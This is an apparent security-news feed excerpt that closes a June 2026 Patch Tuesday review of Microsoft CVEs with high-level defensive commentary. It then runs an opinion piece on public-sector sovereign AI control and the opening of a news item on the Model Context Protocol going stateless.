 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44805"><span>CVE-2026-44805</span></a></td>
  <td width="256" class="xl68">Windows Network
  Controller (NC) Host Agent Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42981"><span>CVE-2026-42981</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42974"><span>CVE-2026-42974</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45487"><span>CVE-2026-45487</span></a></td>
  <td width="256" class="xl68">Windows Program
  Compatibility Assistant Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42828"><span>CVE-2026-42828</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42837"><span>CVE-2026-42837</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42969"><span>CVE-2026-42969</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42971"><span>CVE-2026-42971</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42970"><span>CVE-2026-42970</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42973"><span>CVE-2026-42973</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42978"><span>CVE-2026-42978</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42977"><span>CVE-2026-42977</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42979"><span>CVE-2026-42979</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42991"><span>CVE-2026-42991</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45639"><span>CVE-2026-45639</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42908"><span>CVE-2026-42908</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45593"><span>CVE-2026-45593</span></a></td>
  <td width="256" class="xl68">Windows SDK Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42906"><span>CVE-2026-42906</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42907"><span>CVE-2026-42907</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47648"><span>CVE-2026-47648</span></a></td>
  <td width="256" class="xl68">Windows Storage
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42915"><span>CVE-2026-42915</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP Denial
  of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42904"><span>CVE-2026-42904</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42968"><span>CVE-2026-42968</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42912"><span>CVE-2026-42912</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45597"><span>CVE-2026-45597</span></a></td>
  <td width="256" class="xl68">Windows UI Automation
  Manager (uiamanager.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45599"><span>CVE-2026-45599</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45635"><span>CVE-2026-45635</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40409"><span>CVE-2026-40409</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40404"><span>CVE-2026-40404</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42989"><span>CVE-2026-42989</span></a></td>
  <td width="256" class="xl68">Winlogon
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this release, the scariest-looking one is actually nothing to concern yourself with at all. The CVSS 10 bug in Azure HorizonDB has already been addressed by Microsoft and is just being documented now. That’s also the case for five others. Of course, there wouldn’t be a release without Office bugs that have the Preview Pane as an attack vector. There are multiple in June. There’s a handful of bugs in the Remote Desktop Client, but these rely on connecting to a malicious RDP server. There are three patches for Hyper-V that allow for guest-to-host code execution. The bug in Active Directory requires authentication, but any authenticated user can hit it. For the Windows Directory Service vulnerability, it needs to be listening for TFTP. You have blocked that everywhere, right? The bug in Azure Network Adapter is somewhat unique as you need to update your Linux kernel to be protected. The bug in Azure Kubernetes allows an attacker to break out of a container and gain control of the AKS worker node. Finally, the bug in the Kerberos Key Distribution Center (KDC) seems unlikely, but if exploited, it could allow authenticated attackers to get code execution on affected systems.</p><p class="">Moving on to the other code execution bugs, there are the ubiquitous open-an-own bugs in Office components like Excel and Word. The code injection bug in Exchange Server looks troubling, but it requires a machine-in-the-middle (MiTM), so exploitation is unlikely. The bugs in SharePoint require authentication, but you should note that the patch applies to both SharePoint Server 2016 and SharePoint Enterprise Server 2016. The two bugs in UPnP are interesting. Both can lead to code execution by causing an error during the handling of specially crafted data, which could lead to a Use After Free (UAF) bug. The bugs in RDP Client all require connecting to a malicious RDP server, but it’s not clear why some are rated Critical and some are rated Important. The NTFS vulnerability requires a user to mount a virtual hard drive on an affected system. The last RCE bug this month is in Azure Stack Edge and requires the attacker to send a specially crafted file upload request that includes a manipulated file name or path, leading to code execution.</p><p class="">There are more than 60 Elevation of Privilege (EoP) bugs in this month’s release, and as usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. A notable exception is in Exchange Server, where a user on Outlook Web Access (OWA) could gain access to other mailboxes. The bug in Visual Studio Code could allow attackers to gain permissions associated with the MCP Server’s managed identity. The bugs in Windows SDK and Windows UI Automation Manager could let attacker go from low integrity up to medium integrity code execution. The bug in Bluetooth just allows “elevated” privileges without really describing what elevated might be. </p><p class="">Moving on to the more than 20 security feature bypass (SFB) bugs in the June release, there are a total of 10 that impact Secure Boot. All carry scope change (S:C) in the CVSS, meaning successful exploitation affects security boundaries beyond the vulnerable component itself — specifically the ability to load untrusted code at boot, bypass Virtual Secure Mode, and undermine boot integrity guarantees. CVE-2026-45654 explicitly calls out VSM exposure. The bulk of these are credited to Alon Leviev (STORM), which is notable given his prior BootKitty/BlackLotus-adjacent research. The bugs in the Windows Boot Manager have a similar impact as the Secure Boot bugs. The UEFI Secure Boot vulnerabilities go a layer deeper. They require either local admin or physical access but could allow for the running of untrusted code even before the OS loads. Rootkits anyone? The four bugs in BitLocker all require physical access but could yield encrypted data if exploited. The bug in Windows Administration Protection allows attackers to bypass the feature that prevents standard-user apps from performing admin-level actions. The bug in Visual Studio Copilot Chat could be the most interesting non-boot bug here as it allows authentication impersonation. Mark of the Web (MotW) and Excel vulns could bypass user warnings. Lastly, the bug in PC Manager bypasses expected user controls. </p><p class="">Turning our attention to the mass of spoofing bugs in the release, we instantly see 18 impacting SharePoint Server. Fortunately, these are simply cross-site scripting (XSS) bugs. It’s the Exchange bugs we should really watch for. One is an XSS that an attacker can exploit by convincing an Exchange administrator to open a malicious link or message, which then runs code in the admin's web session. That's a meaningful privilege escalation path. Another is listed as an SSRF-based attack, but no other details are available. The last is a lower-impact XSS with limited confidentiality/integrity loss. The bug in Bing Search (remember Bing?) is a classic search result spoofing. The bug in Azure Stack Edge is interesting as it could allow access to resources outside the vulnerable component's security boundary. The bug in Office for Android requires user interaction. The Office Project Server bug is an authenticated XSS with low impact. The final spoofing bug is in Azure Attestation but has already been addressed. You should still verify you are protected by following the instructions in the write-up from Microsoft.</p><p class="">There are 30 different information disclosure bugs in this release, and fortunately, the vast majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. The two bugs in Visual Studio require user interaction and could “disclose information over a network.” How obtuse. The bug in GitHub Copilot and Visual Studio Code could disclose discloses a sign-in access token for a user's work account. That's a meaningful credential exposure, not just random memory. That leaves the two bugs in Exchange Server. One could allow an authenticated user to gain information about which network services that the Exchange server can reach. The other sounds much like the spoofing bug in OWA as it allows attackers to see information in mailboxes they should not have access to.</p><p class="">I’ve never been a fan of the “tampering” category, as it could mean so many different things. For example, the bug in .NET simply says it could allow an unauthorized attacker to perform tampering locally. Similarly, the bug in Visual Studio says the same, expect here the tampering occurs over a network. Microsoft doesn’t even bother with a CWE for the tampering bug in the DHCP Server, so your guess is as good as mine.</p><p class="">There are seven DoS bugs in the June release, and as usual, Microsoft provides little to no actionable information about the vulnerabilities. The most interesting is the bug in HTTP.sys, which is listed as publicly known. This is an uncontrolled resource consumption, rated "Exploitation More Likely," and publicly disclosed. Since, HTTP.sys sits at the core of IIS and Windows web services, a network-accessible DoS here can take down any Windows server running HTTP-based services. Based on the Acknowledgement, it looks like this bug may have been found using AI. There are no real details for the other bugs, but based simply on the impact, I would focus on the Kerberos and TCP/IP bugs if you had to prioritize.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">The next Patch Tuesday will be on July 14 and will be the last one before Black Hat/DEFCON. It’s usually a big release, so strap in and hang on. I’ll be back then to give you my full thoughts. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p><p class=""> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Sat, 25 Jul 2026 18:57:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Model Context Protocol is going stateless to make scaling simpler]]></title>
<description><![CDATA[Model Context Protocol (MCP), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.



The latest release candidate, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless arch...]]></description>
<link>https://tsecurity.de/de/3694388/it-security-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694388/it-security-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.</p>



<p class="wp-block-paragraph">The latest <a href="https://modelcontextprotocol.io/specification/draft/changelog" target="_blank" rel="noreferrer noopener">release candidate</a>, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless architecture, a change which industry experts say is intended to make MCP easier to deploy across standard cloud infrastructure as enterprises move AI pilots into production.</p>



<p class="wp-block-paragraph">“The session-based model made sense when MCP servers were local processes on a developer’s laptop. In production, it became an operational tax,” said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at ZopDev.</p>



<p class="wp-block-paragraph">“When your infrastructure team asks whether MCP services can scale like other cloud applications, the answer used to be ‘not quite.’ With the move to a stateless architecture, the answer is now yes,” Bandta added.</p>



<p class="wp-block-paragraph">Earlier versions of the protocol maintained information about every client connection, meaning servers had to keep track of each session throughout an interaction. While that approach worked well for local development, it complicated deployments across multiple servers because requests often had to be routed back to the same machine, limiting scalability and making MCP a less natural fit for modern cloud architectures.</p>



<p class="wp-block-paragraph">“Under the new stateless design, every request contains the information needed for any available server to process it independently. Applications that need to maintain context across multiple requests can still do so, but developers must now manage that state explicitly rather than relying on the protocol itself,” she said.</p>



